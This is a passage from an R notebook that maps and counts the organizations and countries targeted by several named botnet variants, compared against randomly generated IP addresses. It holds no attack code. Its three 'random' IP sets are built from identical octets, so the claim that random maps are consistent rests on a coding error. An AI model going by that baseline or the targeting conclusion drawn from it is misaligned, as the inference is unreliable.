chaff_wgetflood_geo <- geoiporg_df(chaff_wgetflood, "IP.Address")
write.csv(chaff_wgetflood_geo,
gzfile("chaff_wgetflood_geo.csv.gz"), row.names=FALSE
)
} else {
chaff_wgetflood_geo <- read.csv("chaff_wgetflood_geo.csv.gz")
}
if(!file.exists("chaff_uwu_geo.csv.gz")){
chaff_uwu_geo <- geoiporg_df(chaff_uwu, "IP.Address")
write.csv(chaff_uwu_geo,
gzfile("chaff_uwu_geo.csv.gz"), row.names=FALSE
)
} else {
chaff_uwu_geo <- read.csv("chaff_uwu_geo.csv.gz")
}
What if these IPs are just random? There's no way to know from just a single map. So let's look at what randomly generated IP maps looks like to compare to. Also, since we have four sets of data from these things, let's map all of them and compare.
set.seed(238174)
SAMPLE_SIZE <- 5000
octs_01 <- lapply(1:4,
FUN=function(x){ sample(1:255, SAMPLE_SIZE, replace=TRUE) }
)
octs_02 <- lapply(1:4,
FUN=function(x){ sample(1:255, SAMPLE_SIZE, replace=TRUE) }
)
octs_03 <- lapply(1:4,
FUN=function(x){ sample(1:255, SAMPLE_SIZE, replace=TRUE) }
)
octs_04 <- lapply(1:4,
FUN=function(x){ sample(1:255, SAMPLE_SIZE, replace=TRUE) }
)
random_ips_01 <- paste(
octs_01[[1]], octs_02[[2]], octs_03[[3]], octs_04[[4]], sep="."
)
random_ips_02 <- paste(
octs_01[[1]], octs_02[[2]], octs_03[[3]], octs_04[[4]], sep="."
)
random_ips_03 <- paste(
octs_01[[1]], octs_02[[2]], octs_03[[3]], octs_04[[4]], sep="."
)
if(!file.exists("random_01_geo.csv.gz")){
random_01_geo_df <- data.frame(IP.Address=random_ips_01)
random_01_geo <- geoiporg_df(random_01_geo_df, "IP.Address")
write.csv(random_01_geo, gzfile("random_01_geo.csv.gz"), row.names=FALSE)
} else {
random_01_geo <- read.csv("random_01_geo.csv.gz")
}
if(!file.exists("random_02_geo.csv.gz")){
random_02_geo_df <- data.frame(IP.Address=random_ips_02)
random_02_geo <- geoiporg_df(random_02_geo_df, "IP.Address")
write.csv(random_02_geo, gzfile("random_02_geo.csv.gz"), row.names=FALSE)
} else {
random_02_geo <- read.csv("random_02_geo.csv.gz")
}
if(!file.exists("random_03_geo.csv.gz")){
random_03_geo_df <- data.frame(IP.Address=random_ips_03)
random_03_geo <- geoiporg_df(random_03_geo_df, "IP.Address")
write.csv(random_03_geo, gzfile("random_03_geo.csv.gz"), row.names=FALSE)
} else {
random_03_geo <- read.csv("random_03_geo.csv.gz")
}
g <- world_mapper(country_code_cleanup(chaff_miori_geo$Country.Code))
g <- g + labs(title="Chaff Mapping: miori", x="", y="")
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g
g <- world_mapper(country_code_cleanup(chaff_saitama121_geo$Country.Code))
g <- g + labs(title="Chaff Mapping: Saitama121", x="", y="")
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g
g <- world_mapper(country_code_cleanup(chaff_tropicalv1_geo$Country.Code))
g <- g + labs(title="Chaff Mapping: TropicalV1", x="", y="")
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g
g <- world_mapper(country_code_cleanup(chaff_wgetflood_geo$Country.Code))
g <- g + labs(title="Chaff Mapping: WGETFLOOD", x="", y="")
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g
g <- world_mapper(country_code_cleanup(chaff_uwu_geo$Country.Code))
g <- g + labs(title="Chaff Mapping: UWU", x="", y="")
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g
g <- world_mapper(country_code_cleanup(random_01_geo$Country.Code))
g <- g + labs(title="Randomly Generated IP Addresses", x="", y="")
g <- g + scale_fill_continuous(low="#000030", high="#000030", guide="colorbar")
g
g <- world_mapper(country_code_cleanup(random_02_geo$Country.Code))
g <- g + labs(title="Randomly Generated IP Addresses", x="", y="")
g <- g + scale_fill_continuous(low="#000030", high="#000030", guide="colorbar")
g
g <- world_mapper(country_code_cleanup(random_03_geo$Country.Code))
g <- g + labs(title="Randomly Generated IP Addresses", x="", y="")
g <- g + scale_fill_continuous(low="#000030", high="#000030", guide="colorbar")
g
Since it's pretty clear random is pretty consistent, and none of these graphs are consistent, there's clearly some targeting going on. Even if it were a different random algorithm, there should be some more consistency.
So let's look at the organizations directly being attacked.
chaff_miori_org <- aggregate(
count ~ Organization.Name, data=chaff_miori_geo, FUN=sum
)
head(chaff_miori_org[
order(-chaff_miori_org$count), c("count", "Organization.Name")
], n=100)
## count Organization.Name
## 233 321 Future use
## 177 267 DoD Network Information Center (DNIC)
## 393 254 Multicast
## 492 136 RIPE Network Coordination Centre (RIPE)
## 134 96 Comcast Cable Communications, LLC (CCCS)
## 329 95 LACNIC
## 57 93 Asia Pacific Network Information Centre (APNIC)
## 670 85 Verizon Business (MCICS)
## 41 81 Amazon Technologies Inc. (AT-88-Z)
## 257 67 Headquarters, USAISC (HEADQU-3)
## 59 56 AT&T Corp. (AC-3280)
## 539 55 SOFTBANK Corp.
## 110 50 Charter Communications Inc (CC-3517)
## 378 47 Microsoft Corporation (MSFT)
## 573 42 T-Mobile USA, Inc. (TMOBI)
## 43 35 Amazon.com, Inc. (AMAZO-4)
## 105 33 CenturyLink Communications, LLC (CCL-534)
## 338 33 Level 3 Parent, LLC (LPL-141)
## 20 29 African Network Information Center (AFRINIC)
## 166 28 Deutsche Telekom AG
## 223 27 Ford Motor Company (FORDMO)
## 332 26 Latin American and Caribbean IP address Regional Registry (LACNIC)
## 50 24 Apple Inc. (APPLEC-1-Z)
## 284 23 IBM (IBM-1-Z)
## 641 23 United States Postal Service. (USPS-3)
## 40 22 Amateur Radio Digital Communications (ARDC)
## 66 22 AT&T Services, Inc. (ATTW-Z)
## 246 22 Google LLC (GOOGL-2)
## 708 21 Windstream Communications LLC (WINDS-6)
## 637 20 UK Ministry of Defence
## 23 18 Air Force Systems Networking (7ESG)
## 80 18 Bell Canada (LINX)
## 149 18 Cox Communications Inc. (CXA)
## 283 18 IANA - Private Use
## 114 17 China Mobile Communications Corporation
## 109 16 Charter Communications (CC04)
## 113 16 China Mobile
## 476 16 PSINet, Inc. (PSI)
## 9 15 A100 ROW Inc
## 65 15 AT&T Services, Inc. (ATTSE-Z)
## 615 15 The Prudential Insurance Company of America (PICA-3-Z)
## 61 14 AT&T Corp. (AC-3873)
## 599 14 Telstra Corporation Limited
## 62 13 AT&T Global Network Services, LLC (ATGS)
## 587 13 Telecom Italia S.p.A.
## 14 12 Administered by LACNIC
## 26 12 Akamai Technologies, Inc. (AKAMAI)
## 64 12 AT&T Mobility LLC (ATTMO-3)
## 302 12 Internet Assigned Numbers Authority (IANA)
## 421 12 North Star Information Hi.tech Ltd. Co.
## 369 11 Mercedes-Benz Group AG
## 370 11 Merck and Co., Inc. (MERCKA)
## 191 10 Eli Lilly and Company (ELILIL)
## 55 9 ARIN
## 230 9 Frontier Communications of America, Inc. (FRTR)
## 401 9 Navy Network Information Center (NNIC) (NNICN-1)
## 427 9 NTT America, Inc. (NTTAM-1)
## 532 9 SITA Switzerland Sarl
## 262 8 HEWLETT PACKARD ENTERPRISE COMPANY (HPE-15)
## 518 8 Service Provider Corporation (SPC-10)
## 520 8 Shared Services Canada (SSC-299-Z)
## 522 8 Shaw Communications Inc. (SHAWC)
## 32 7 Alibaba.com LLC (AL-3)
## 229 7 Frontier Communications Corporation (FCC-212)
## 312 7 JPMorgan Chase & Co. (JMC-39)
## 371 7 Merit Network Inc. (MICH-Z)
## 443 7 Optimum Online (OPTO)
## 601 7 Tencent Cloud Computing (Beijing) Co., Ltd
## 395 6 National Aeronautics and Space Administration (NASA)
## 494 6 Rogers Communications Canada Inc. (RCC-182)
## 550 6 Sprint (SPRN-Z)
## 19 5 African Network Information Center - ( AfriNIC Ltd. )
## 33 5 Alibaba.com Singapore E-Commerce Private Limited
## 85 5 Bharti Airtel Limited
## 129 5 Cloudflare, Inc. (CLOUD14)
## 172 5 Dimension Data
## 309 5 JCOM Co., Ltd.
## 419 5 Nokia of America Corporation (NAC-178)
## 432 5 Oath Holdings Inc. (OH-207)
## 444 5 Optus Internet Pty Ltd
## 448 5 Orange S.A.
## 475 5 PSINet, Inc. (PSI-1)
## 540 5 SoftLayer Technologies Inc. (SOFTL)
## 663 5 US Courts (AOUSC)
## 685 5 Vodafone Limited
## 711 5 Xerox Corporation (XEROX-16-Z)
## 12 4 Administered by AFRINIC
## 111 4 Charter Communications, Inc (CC-3518)
## 244 4 Google Fiber Inc. (GF)
## 275 4 HP Inc. (HPINC-Z)
## 326 4 KPN B.V.
## 367 4 MegaPath Networks Inc. (MENT)
## 483 4 RADIANZ Americas, Inc. (RADIAN-25)
## 551 4 Sprint (SPRN)
## 564 4 SURF B.V.
## 604 4 Texas Department of Information Resources (TDIR)
## 614 4 The Procter and Gamble Company (THEPRO-10)
## 699 4 Wayport, LLC (WYPR)
## 707 4 WIND TRE S.P.A.
## 8 3 A1 Telekom Austria AG
chaff_saitama121_org <- aggregate(
count ~ Organization.Name, data=chaff_saitama121_geo, FUN=sum
)
head(chaff_saitama121_org[
order(-chaff_saitama121_org$count), c("count", "Organization.Name")
], n=100)
## count Organization.Name
## 49 129 Asia Pacific Network Information Centre (APNIC)
## 461 108 RIPE Network Coordination Centre (RIPE)
## 108 65 China Mobile Communications Corporation
## 58 50 ATI - Agence Tunisienne Internet
## 150 42 Dimension Data
## 355 40 Microsoft Corporation (MSFT)
## 636 39 Verizon Business (MCICS)
## 167 38 EE Limited
## 51 36 AT&T Corp. (AC-3280)
## 153 36 DoD Network Information Center (DNIC)
## 552 35 Telecom Italia S.p.A.
## 311 30 LACNIC
## 145 29 Deutsche Telekom AG
## 34 25 Amazon Technologies Inc. (AT-88-Z)
## 124 25 Comcast Cable Communications, LLC (CCCS)
## 599 25 Turk Telekomunikasyon Anonim Sirketi
## 477 23 Saudi Telecom Company JSC
## 313 22 Latin American and Caribbean IP address Regional Registry (LACNIC)
## 564 22 Telenor Sverige AB
## 325 21 Liquid Telecommunications Operations Limited
## 507 18 SOFTBANK Corp.
## 537 14 T-Mobile USA, Inc. (TMOBI)
## 104 13 Charter Communications Inc (CC-3517)
## 181 13 ETISALAT MISR
## 669 13 WIND TRE S.P.A.
## 36 12 Amazon.com, Inc. (AMAZO-4)
## 84 12 British Telecommunications PLC
## 57 11 AT&T Services, Inc. (ATTW-Z)
## 134 11 Cox Communications Inc. (CXA)
## 100 10 CenturyLink Communications, LLC (CCL-534)
## 103 10 Charter Communications (CC04)
## 234 10 Hetzner Online GmbH
## 251 10 IBM (IBM-1-Z)
## 546 10 TE Data
## 587 10 The Prudential Insurance Company of America (PICA-3-Z)
## 648 10 Virgin Media Limited
## 7 9 A100 ROW Inc
## 223 9 Google LLC (GOOGL-2)
## 317 9 Level 3 Parent, LLC (LPL-141)
## 609 9 UK Ministry of Defence
## 16 8 African Network Information Center - ( AfriNIC Ltd. )
## 17 8 African Network Information Center (AFRINIC)
## 20 8 Air Force Systems Networking (7ESG)
## 107 8 China Mobile
## 202 8 Ford Motor Company (FORDMO)
## 232 8 Headquarters, USAISC (HEADQU-3)
## 252 8 Icosnet SPA
## 374 8 Navy Network Information Center (NNIC) (NNICN-1)
## 437 8 Polkomtel Sp. z o.o.
## 442 8 PSINet, Inc. (PSI)
## 566 8 Telia Company AB
## 640 8 Verizon Nederland B.V.
## 663 8 Wana Corporate
## 670 8 Windstream Communications LLC (WINDS-6)
## 684 8 Ziggo Services B.V.
## 393 7 NTT America, Inc. (NTTAM-1)
## 563 7 Telenor Norge AS
## 24 6 Akamai Technologies, Inc. (AKAMAI)
## 152 6 DNA Oyj
## 183 6 Euronet Communications B.V.
## 299 6 JSC "Silknet"
## 306 6 KPN B.V.
## 559 6 TELEFONICA DE ESPANA
## 41 5 Apple Inc. (APPLEC-1-Z)
## 53 5 AT&T Global Network Services, LLC (ATGS)
## 147 5 DIGI Tavkozlesi es Szolgaltato Kft.
## 447 5 PTK-Centertel
## 502 5 SITA Switzerland Sarl
## 3 4 1&1 Versatel Deutschland GmbH
## 14 4 Administered by LACNIC
## 25 4 Alabama State Department of Education (ASDE)
## 29 4 Alibaba.com Singapore E-Commerce Private Limited
## 33 4 Amateur Radio Digital Communications (ARDC)
## 55 4 AT&T Mobility LLC (ATTMO-3)
## 56 4 AT&T Services, Inc. (ATTSE-Z)
## 149 4 DigitalOcean, LLC (DO-13)
## 165 4 ecotel communication ag
## 168 4 Eircom Limited
## 170 4 Elisa Oyj
## 269 4 Integrated Device Technology, Inc. (IDT-5)
## 322 4 Link Egypt (Link.NET)
## 353 4 Merit Network Inc. (MICH-Z)
## 379 4 Net By Net Holding LLC
## 396 4 Oath Holdings Inc. (OH-207)
## 412 4 Orange Belgium SA
## 423 4 Partner Communications Ltd.
## 494 4 Shaw Communications Inc. (SHAWC)
## 521 4 Strato AG
## 562 4 Telenor A/S
## 654 4 Vodafone Limited
## 680 4 Zebra Technologies Corporation (ZEBRAT)
## 30 3 Allstream Business US, LLC (ABUL-14)
## 39 3 ANS Communications, Inc (ANS)
## 70 3 Bharti Airtel Limited
## 83 3 BRIGHAM YOUNG UNIVERSITY - IDAHO (BRIGH-22)
## 86 3 BT Italia S.p.A.
## 98 3 Cellcom Fixed Line Communication L.P.
## 129 3 Coolwave Communications Limited
## 169 3 Eli Lilly and Company (ELILIL)
## 180 3 Ethiopian Educational Research Network (EthERNet)
chaff_tropicalv1_org <- aggregate(
count ~ Organization.Name, data=chaff_tropicalv1_geo, FUN=sum
)
head(chaff_tropicalv1_org[
order(-chaff_tropicalv1_org$count), c("count", "Organization.Name")
], n=100)
## count Organization.Name
## 488 120 RIPE Network Coordination Centre (RIPE)
## 331 102 LACNIC
## 50 93 Asia Pacific Network Information Centre (APNIC)
## 166 66 DoD Network Information Center (DNIC)
## 19 65 African Network Information Center (AFRINIC)
## 301 62 JPMorgan Chase & Co. (JMC-39)
## 157 39 Deutsche Telekom AG
## 18 35 African Network Information Center - ( AfriNIC Ltd. )
## 658 32 Verizon Business (MCICS)
## 117 31 China Mobile Communications Corporation
## 60 29 ATI - Agence Tunisienne Internet
## 106 29 CenturyLink Communications, LLC (CCL-534)
## 122 29 Citicorp (CITICO-10)
## 139 29 Comcast Cable Communications, LLC (CCCS)
## 162 28 Dimension Data
## 334 27 Level 3 Parent, LLC (LPL-141)
## 567 21 Telecom Italia S.p.A.
## 369 19 Microsoft Corporation (MSFT)
## 474 19 PSINet, Inc. (PSI)
## 442 18 Orange S.A.
## 664 18 Virgin Media Limited
## 113 17 Charter Communications Inc (CC-3517)
## 520 17 Sprint (SPRN-Z)
## 52 15 AT&T Corp. (AC-3280)
## 246 15 Headquarters, USAISC (HEADQU-3)
## 417 15 NTT America, Inc. (NTTAM-1)
## 116 14 China Mobile
## 223 14 Free SAS
## 599 14 The Prudential Insurance Company of America (PICA-3-Z)
## 512 13 SOFTBANK Corp.
## 13 12 ADP, INC. (ADP-5)
## 35 12 Amazon Technologies Inc. (AT-88-Z)
## 263 11 IBM (IBM-1-Z)
## 6 10 3M Company (3MCOMP-Z)
## 8 10 A100 ROW Inc
## 21 10 Air Force Systems Networking (7ESG)
## 58 10 AT&T Services, Inc. (ATTSE-Z)
## 333 10 Latin American and Caribbean IP address Regional Registry (LACNIC)
## 651 9 US Courts (AOUSC)
## 36 8 Amazon.com, Inc. (AMAZO-4)
## 390 8 Navy Network Information Center (NNIC) (NNICN-1)
## 563 8 Tele2 Sverige AB
## 587 8 Telstra Corporation Limited
## 20 7 AGIS (AGIS)
## 23 7 Airtel Networks Kenya Limited
## 55 7 AT&T Global Network Services, LLC (ATGS)
## 163 7 Diplomatic Telecommunications Services - Program Office (DTS-PO) (DTSPOD)
## 279 7 Inteliquent, inc. (NTAJC)
## 574 7 Telefonica Germany GmbH & Co.OHG
## 184 6 EMTEL LIMITED
## 194 6 ETISALAT MISR
## 220 6 Ford Motor Company (FORDMO)
## 233 6 Google LLC (GOOGL-2)
## 265 6 Icosnet SPA
## 381 6 MTN Nigeria
## 552 6 T-Mobile USA, Inc. (TMOBI)
## 579 6 Telenor Sverige AB
## 581 6 Telia Company AB
## 588 6 TELUS Communications Inc. (TACE)
## 594 6 The Egyptian Company for Mobile Services (Mobinil)
## 24 5 Akamai Technologies, Inc. (AKAMAI)
## 34 5 Amateur Radio Digital Communications (ARDC)
## 59 5 AT&T Services, Inc. (ATTW-Z)
## 149 5 Cox Communications Inc. (CXA)
## 249 5 Hetzner Online GmbH
## 343 5 Liquid Telecommunications Operations Limited
## 364 5 Mercedes-Benz Group AG
## 441 5 Orange Polska Spolka Akcyjna
## 467 5 Polkomtel Sp. z o.o.
## 568 5 Telecom Malagasy
## 637 5 University of California - Office of the President (UCOP-Z)
## 671 5 Vodafone GmbH
## 703 5 Windstream Communications LLC (WINDS-6)
## 9 4 AAPT Limited
## 53 4 AT&T Corp. (AC-3873)
## 70 4 Bell Canada (LINX)
## 74 4 Bharti Airtel Limited
## 88 4 BSE Software GmbH
## 112 4 Charter Communications (CC04)
## 161 4 DigitalOcean, LLC (DO-13)
## 179 4 Elisa Oyj
## 224 4 freenet Datenkommunikations GmbH
## 299 4 JCOM Co., Ltd.
## 368 4 Metrofibre Networx
## 375 4 Mobile Telecommunications Company
## 378 4 Montgomery College. (MONTGO-11)
## 380 4 MTN COTE D'IVOIRE S.A
## 424 4 Office National des Postes et Telecommunications ONPT (Maroc Telecom) / IAM
## 428 4 OneNet (OSRHE)
## 435 4 Optus Internet Pty Ltd
## 510 4 SITA Switzerland Sarl
## 513 4 SoftLayer Technologies Inc. (SOFTL)
## 557 4 TDC A/S
## 559 4 TE Data
## 626 4 U.S. Department of State (UDS-6)
## 702 4 WIND TRE S.P.A.
## 708 4 Xerox Corporation (XEROX-16-Z)
## 710 4 Xs4all Internet BV
## 7 3 A1 Telekom Austria AG
## 28 3 Alibaba.com Singapore E-Commerce Private Limited
chaff_wgetflood_org <- aggregate(
count ~ Organization.Name, data=chaff_wgetflood_geo, FUN=sum
)
head(chaff_wgetflood_org[
order(-chaff_wgetflood_org$count), c("count", "Organization.Name")
], n=100)
## count Organization.Name
## 231 377 Future use
## 394 291 Multicast
## 487 118 RIPE Network Coordination Centre (RIPE)
## 486 107 RIPE NCC
## 656 102 Verizon Business (MCICS)
## 145 94 Comcast Cable Communications, LLC (CCCS)
## 53 87 AT&T Corp. (AC-3280)
## 51 72 Asia Pacific Network Information Centre (APNIC)
## 327 63 LACNIC
## 379 60 Microsoft Corporation (MSFT)
## 531 57 SOFTBANK Corp.
## 339 51 Level 3 Parent, LLC (LPL-141)
## 569 48 T-Mobile USA, Inc. (TMOBI)
## 35 47 Amazon Technologies Inc. (AT-88-Z)
## 120 38 CenturyLink Communications, LLC (CCL-534)
## 123 37 Charter Communications Inc (CC-3517)
## 465 37 PSINet, Inc. (PSI)
## 37 36 Amazon.com, Inc. (AMAZO-4)
## 128 34 China Mobile
## 24 30 African Network Information Center (AFRINIC)
## 332 27 Latin American and Caribbean IP address Regional Registry (LACNIC)
## 249 26 Google LLC (GOOGL-2)
## 278 24 IBM (IBM-1-Z)
## 122 23 Charter Communications (CC04)
## 609 23 The Prudential Insurance Company of America (PICA-3-Z)
## 55 22 AT&T Global Network Services, LLC (ATGS)
## 221 22 Ford Motor Company (FORDMO)
## 59 21 AT&T Services, Inc. (ATTW-Z)
## 172 20 Deutsche Telekom AG
## 42 19 Apple Inc. (APPLEC-1-Z)
## 129 19 China Mobile Communications Corporation
## 374 19 Mercedes-Benz Group AG
## 34 18 Amateur Radio Digital Communications (ARDC)
## 58 17 AT&T Services, Inc. (ATTSE-Z)
## 180 17 DoD Network Information Center (DNIC)
## 592 17 Telstra Corporation Limited
## 704 17 Windstream Communications LLC (WINDS-6)
## 157 16 Cox Communications Inc. (CXA)
## 29 15 Akamai Technologies, Inc. (AKAMAI)
## 45 14 ARIN
## 83 12 Bell Canada (LINX)
## 261 12 HEWLETT PACKARD ENTERPRISE COMPANY (HPE-15)
## 311 12 JPMorgan Chase & Co. (JMC-39)
## 421 12 Oath Holdings Inc. (OH-207)
## 526 12 SITA Switzerland Sarl
## 86 11 Bharti Airtel Limited
## 563 10 SURF B.V.
## 195 9 Eli Lilly and Company (ELILIL)
## 377 9 Merit Network Inc. (MICH-Z)
## 418 9 NTT America, Inc. (NTTAM-1)
## 512 9 Service Provider Corporation (SPC-10)
## 40 8 ANS Communications, Inc (ANS)
## 227 8 Frontier Communications Corporation (FCC-212)
## 375 8 Merck and Co., Inc. (MERCKA)
## 413 8 North Star Information Hi.tech Ltd. Co.
## 532 8 SoftLayer Technologies Inc. (SOFTL)
## 17 7 Administered by LACNIC
## 23 7 African Network Information Center - ( AfriNIC Ltd. )
## 309 7 JCOM Co., Ltd.
## 443 7 Orange S.A.
## 468 7 PT.TELKOMSEL Indonesia
## 490 7 Rogers Communications Canada Inc. (RCC-182)
## 14 6 Administered by AFRINIC
## 32 6 Alibaba.com Singapore E-Commerce Private Limited
## 54 6 AT&T Corp. (AC-3873)
## 57 6 AT&T Mobility LLC (ATTMO-3)
## 177 6 Dimension Data
## 298 6 Internet Assigned Numbers Authority (IANA)
## 517 6 Shared Services Canada (SSC-299)
## 541 6 Sprint (SPRN-Z)
## 572 6 Tata Communications Limited
## 708 6 Xerox Corporation (XEROX-16-Z)
## 135 5 Citicorp (CITICO-10)
## 224 5 Free SAS
## 228 5 Frontier Communications of America, Inc. (FRTR)
## 372 5 MegaPath Corporation (MC-289)
## 409 5 Nokia of America Corporation (NAC-178)
## 434 5 Optimum Online (OPTO)
## 446 5 Pakistan Telecommuication company limited
## 464 5 PSINet, Inc. (PSI-1)
## 542 5 Sprint (SPRN)
## 598 5 Texas Department of Information Resources (TDIR)
## 108 4 CABLE ONE, INC. (CBL1)
## 141 4 COGECO COMMUNICATIONS INC. (CGOC)
## 183 4 DXC US Latin America Corporation (ESLAC-Z)
## 184 4 DXC US Latin America Corporation (ESLAC)
## 225 4 Frontier Communications Corporation (FCC-210)
## 256 4 Headquarters, USAISC (HEADQU-3)
## 323 4 KPN B.V.
## 435 4 Optimum WiFi (CHL-54)
## 474 4 Rackspace Hosting (RACKS-8)
## 584 4 TELEFONICA DE ESPANA
## 589 4 Telia Company AB
## 3 3 3M Company (3MCOMP-Z)
## 16 3 Administered by ARIN
## 60 3 ATI - Agence Tunisienne Internet
## 97 3 Board of Regents of the University System of Georgia (SBR)
## 121 3 CERFnet (CERF)
## 124 3 Charter Communications, Inc (CC-3518)
## 196 3 Elisa Oyj
chaff_uwu_org <- aggregate(
count ~ Organization.Name, data=chaff_uwu_geo, FUN=sum
)
head(chaff_uwu_org[
order(-chaff_uwu_org$count), c("count", "Organization.Name")
], n=100)
## count Organization.Name
## 562 174 RIPE Network Coordination Centre (RIPE)
## 59 108 AT&T Corp. (AC-3280)
## 160 108 Comcast Cable Communications, LLC (CCCS)
## 56 104 Asia Pacific Network Information Centre (APNIC)
## 784 100 Verizon Business (MCICS)
## 41 67 Amazon Technologies Inc. (AT-88-Z)
## 121 67 Charter Communications Inc (CC-3517)
## 622 67 SOFTBANK Corp.
## 439 65 Microsoft Corporation (MSFT)
## 188 52 Deutsche Telekom AG
## 396 52 Level 3 Parent, LLC (LPL-141)
## 199 51 DoD Network Information Center (DNIC)
## 115 49 CenturyLink Communications, LLC (CCL-534)
## 668 47 T-Mobile USA, Inc. (TMOBI)
## 43 38 Amazon.com, Inc. (AMAZO-4)
## 393 36 Latin American and Caribbean IP address Regional Registry (LACNIC)
## 65 34 AT&T Services, Inc. (ATTW-Z)
## 126 31 China Mobile
## 720 31 The Prudential Insurance Company of America (PICA-3-Z)
## 21 30 African Network Information Center (AFRINIC)
## 755 28 UK Ministry of Defence
## 120 26 Charter Communications (CC04)
## 284 25 Google LLC (GOOGL-2)
## 127 23 China Mobile Communications Corporation
## 297 23 Headquarters, USAISC (HEADQU-3)
## 540 23 PSINet, Inc. (PSI)
## 255 22 Ford Motor Company (FORDMO)
## 25 21 Air Force Systems Networking (7ESG)
## 51 21 Apple Inc. (APPLEC-1-Z)
## 9 20 A100 ROW Inc
## 40 19 Amateur Radio Digital Communications (ARDC)
## 323 19 IBM (IBM-1-Z)
## 431 17 Mercedes-Benz Group AG
## 28 16 Akamai Technologies, Inc. (AKAMAI)
## 64 16 AT&T Services, Inc. (ATTSE-Z)
## 169 16 Cox Communications Inc. (CXA)
## 80 14 Bell Canada (LINX)
## 697 14 Telstra Corporation Limited
## 827 14 Windstream Communications LLC (WINDS-6)
## 63 13 AT&T Mobility LLC (ATTMO-3)
## 219 13 Eli Lilly and Company (ELILIL)
## 432 13 Merck and Co., Inc. (MERCKA)
## 609 13 SITA Switzerland Sarl
## 60 12 AT&T Corp. (AC-3873)
## 464 12 Navy Network Information Center (NNIC) (NNICN-1)
## 479 12 North Star Information Hi.tech Ltd. Co.
## 594 11 Service Provider Corporation (SPC-10)
## 628 11 Sprint (SPRN-Z)
## 504 9 Orange S.A.
## 371 8 JPMorgan Chase & Co. (JMC-39)
## 496 8 Oracle Corporation (ORACLE-4)
## 542 8 PT.TELKOMSEL Indonesia
## 599 8 Shaw Communications Inc. (SHAWC)
## 258 7 Free SAS
## 482 7 NTT America, Inc. (NTTAM-1)
## 486 7 Oath Holdings Inc. (OH-207)
## 656 7 SURF B.V.
## 20 6 African Network Information Center - ( AfriNIC Ltd. )
## 31 6 Alibaba.com LLC (AL-3)
## 194 6 DigitalOcean, LLC (DO-13)
## 567 6 Rogers Communications Canada Inc. (RCC-182)
## 597 6 Shared Services Canada (SSC-299)
## 48 5 ANS Communications, Inc (ANS)
## 83 5 Bharti Airtel Limited
## 122 5 Charter Communications, Inc (CC-3518)
## 146 5 Cloudflare, Inc. (CLOUD14)
## 283 5 Google Fiber Inc. (GF)
## 328 5 iiNet Limited
## 366 5 JCOM Co., Ltd.
## 434 5 Merit Network Inc. (MICH-Z)
## 493 5 Optimum Online (OPTO)
## 500 5 Orange Business Services
## 539 5 PSINet, Inc. (PSI-1)
## 670 5 TalkTalk Communications Limited
## 698 5 TELUS Communications Inc. (TACE)
## 831 5 Xerox Corporation (XEROX-16-Z)
## 12 4 ACEVILLE PTE.LTD.
## 14 4 Administered by AFRINIC
## 32 4 Alibaba.com Singapore E-Commerce Private Limited
## 35 4 Allstream Business US, LLC (ABUL-14)
## 53 4 ARIN
## 73 4 Bank of America, National Association (BANKOF-2)
## 116 4 CERFnet (CERF)
## 140 4 Citicorp (CITICO-10)
## 216 4 EE Limited
## 261 4 Frontier Communications Corporation (FCC-210)
## 263 4 Frontier Communications of America, Inc. (FRTR)
## 280 4 GONET (GOVER-10)
## 308 4 Hong Kong Broadband Network Ltd
## 350 4 Internap Holding LLC (IC-1425)
## 403 4 Liquid Telecommunications Operations Limited
## 417 4 Massachusetts Institute of Technology (MIT-2)
## 428 4 MegaPath Corporation (MC-289)
## 441 4 Microsoft Limited
## 499 4 ORANGE BUSINESS COMMUNICATIONS TECHNOLOGY LIMITED
## 629 4 Sprint (SPRN)
## 649 4 Suddenlink Communications (SUDDE)
## 676 4 TDC Holding A/S
## 701 4 Texas Department of Information Resources (TDIR)
## 800 4 Vodafone GmbH
Just curious…
random_01_org <- aggregate(
count ~ Organization.Name, data=random_01_geo, FUN=sum
)
head(random_01_org[
order(-random_01_org$count), c("count", "Organization.Name")
], n=100)
## count Organization.Name
## 247 316 Future use
## 417 292 Multicast
## 180 258 DoD Network Information Center (DNIC)
## 515 120 RIPE Network Coordination Centre (RIPE)
## 514 110 RIPE NCC
## 671 103 Verizon Business (MCICS)
## 37 98 Amazon Technologies Inc. (AT-88-Z)
## 143 96 Comcast Cable Communications, LLC (CCCS)
## 53 84 Asia Pacific Network Information Centre (APNIC)
## 55 71 AT&T Corp. (AC-3280)
## 12 55 Administered by RIPE NCC
## 268 55 Headquarters, USAISC (HEADQU-3)
## 555 54 SOFTBANK Corp.
## 405 53 Microsoft Corporation (MSFT)
## 587 47 T-Mobile USA, Inc. (TMOBI)
## 110 38 CenturyLink Communications, LLC (CCL-534)
## 114 34 Charter Communications Inc (CC-3517)
## 494 33 PSINet, Inc. (PSI)
## 173 31 Deutsche Telekom AG
## 262 29 Google LLC (GOOGL-2)
## 38 28 Amazon.com, Inc. (AMAZO-4)
## 351 27 LACNIC
## 360 27 Level 3 Parent, LLC (LPL-141)
## 19 25 Air Force Systems Networking (7ESG)
## 118 25 China Mobile
## 622 25 The Prudential Insurance Company of America (PICA-3-Z)
## 36 23 Amateur Radio Digital Communications (ARDC)
## 17 22 African Network Information Center (AFRINIC)
## 62 21 AT&T Services, Inc. (ATTW-Z)
## 58 20 AT&T Global Network Services, LLC (ATGS)
## 113 20 Charter Communications (CC04)
## 644 20 UK Ministry of Defence
## 230 19 Ford Motor Company (FORDMO)
## 295 19 IBM (IBM-1-Z)
## 45 18 Apple Inc. (APPLEC-1-Z)
## 712 18 Windstream Communications LLC (WINDS-6)
## 439 17 North Star Information Hi.tech Ltd. Co.
## 646 17 United States Postal Service. (USPS-3)
## 155 16 Cox Communications Inc. (CXA)
## 23 15 Akamai Technologies, Inc. (AKAMAI)
## 119 15 China Mobile Communications Corporation
## 196 15 Eli Lilly and Company (ELILIL)
## 353 15 Latin American and Caribbean IP address Regional Registry (LACNIC)
## 609 15 Telstra Corporation Limited
## 61 14 AT&T Services, Inc. (ATTSE-Z)
## 294 14 IANA - Private Use
## 537 14 Service Provider Corporation (SPC-10)
## 56 13 AT&T Corp. (AC-3873)
## 272 12 HEWLETT PACKARD ENTERPRISE COMPANY (HPE-15)
## 316 12 Internet Assigned Numbers Authority (IANA)
## 447 12 NTT America, Inc. (NTTAM-1)
## 565 12 Sprint (SPRN-Z)
